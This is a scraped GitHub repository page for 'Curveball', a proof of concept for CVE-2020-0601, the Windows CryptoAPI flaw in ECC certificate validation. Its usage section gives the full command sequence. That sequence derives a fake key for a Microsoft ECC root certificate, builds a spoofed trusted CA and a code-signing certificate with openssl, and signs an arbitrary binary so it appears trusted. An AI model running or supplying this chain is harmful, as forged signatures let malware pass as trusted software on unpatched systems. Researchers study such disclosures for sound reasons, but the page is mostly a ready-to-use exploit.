Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up

PoC for CVE-2020-0601 - CryptoAPI exploit

NotificationsYou must be signed in to change notification settings

ioncodes/Curveball

Repository files navigation

A PoC forCVE-2020-0601. A detailed blog post can be foundhere. This exploit allows you to create a fake trusted certificate by abusing how CryptoAPI handles certain parameters on ECC based certificates.

Setup

Clone the repository and open it in Visual Studio 2019. Switch to Release and compile it. You can find prebuilt binarieshere.

Usage

.\Curveball.exe MicrosoftECCProductRootCertificateAuthority.cer MicrosoftECCProductRootCertificateAuthority_fake.key# in linux bash (you can also use Windows but you'd have to get an alternative for osslsigncode). WSL on Windows works fine.openssl req -new -x509 -key MicrosoftECCProductRootCertificateAuthority_fake.key -out trusted_ca.crtopenssl ecparam -name secp384r1 -genkey -noout -out cert.keyopenssl req -new -key cert.key -out cert.csr -config openssl.conf -reqexts v3_csopenssl x509 -req -in cert.csr -CA trusted_ca.crt -CAkey MicrosoftECCProductRootCertificateAuthority_fake.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl.conf -extensions v3_csopenssl pkcs12 -export -in cert.crt -inkey cert.key -certfile trusted_ca.crt -name"Code Signing" -out cert.p12./osslsigncode sign -pkcs12 cert.p12 -n"Signed by Layle" -in<BINARY_TO_SIGN> -out<SIGNED_BINARY>

Result

Note that the 7zip installer is usually not signed!

trusted

About

PoC for CVE-2020-0601 - CryptoAPI exploit

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages


[8]ページ先頭

©2009-2025 Movatter.jp